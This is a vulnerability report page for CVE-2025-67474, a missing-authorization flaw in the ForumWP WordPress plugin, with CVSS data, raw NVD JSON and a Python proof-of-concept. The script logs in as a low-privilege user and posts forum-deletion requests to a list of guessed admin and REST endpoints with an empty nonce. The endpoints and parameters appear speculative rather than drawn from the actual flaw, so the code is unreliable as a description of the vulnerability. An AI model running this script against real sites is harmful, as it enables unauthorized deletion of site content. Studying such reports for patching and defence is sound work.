Security Vulnerability Report
中文
CVE-2025-67474 CVSS 4.3 MEDIUM

CVE-2025-67474

Published: 2025-12-09 16:18:24
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in Ultimate Member ForumWP forumwp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ForumWP: from n/a through <= 2.1.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ForumWP <= 2.1.4(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67474 PoC - ForumWP Missing Authorization # This PoC demonstrates the Broken Access Control vulnerability in ForumWP plugin import requests import sys from urllib.parse import urljoin def exploit_forumwp_cve_2025_67474(target_url, username, password): """ Exploit for CVE-2025-67474: Missing Authorization in ForumWP plugin Requirements: - Valid user account on the WordPress site (low privilege is sufficient) - ForumWP plugin <= 2.1.4 installed """ session = requests.Session() # Step 1: Login as low-privilege user login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url } print(f"[*] Logging in as {username}...") response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Identify vulnerable ForumWP endpoints # Common vulnerable endpoints in ForumWP vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=fwmp_forum_management', '/wp-json/forumwp/v1/forum/', '/wp-admin/admin.php?page=forumwp-forums', '/wp-admin/admin-ajax.php?action=fwmp_delete_forum' ] print("[*] Testing vulnerable endpoints...") # Step 3: Attempt unauthorized actions for endpoint in vulnerable_endpoints: full_url = urljoin(target_url, endpoint) # Example: Try to delete a forum (requires admin privileges) exploit_data = { 'action': 'fwmp_delete_forum', 'forum_id': '1', 'nonce': '' # May be missing or guessable } try: response = session.post(full_url, data=exploit_data, timeout=10) # Check if exploit was successful if response.status_code == 200: if 'success' in response.text.lower() or response.json().get('success'): print(f"[+] Exploit successful on endpoint: {endpoint}") print(f"[+] Response: {response.text[:200]}") return True except Exception as e: print(f"[-] Error testing {endpoint}: {e}") print("[-] No vulnerable endpoints found or exploit failed") return False if __name__ == '__main__': if len(sys.argv) < 4: print("Usage: python cve_2025_67474_poc.py <target_url> <username> <password>") print("Example: python cve_2025_67474_poc.py http://example.com testuser testpass") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_forumwp_cve_2025_67474(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67474", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:23.903", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Ultimate Member ForumWP forumwp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ForumWP: from n/a through <= 2.1.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/forumwp/vulnerability/wordpress-forumwp-plugin-2-1-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}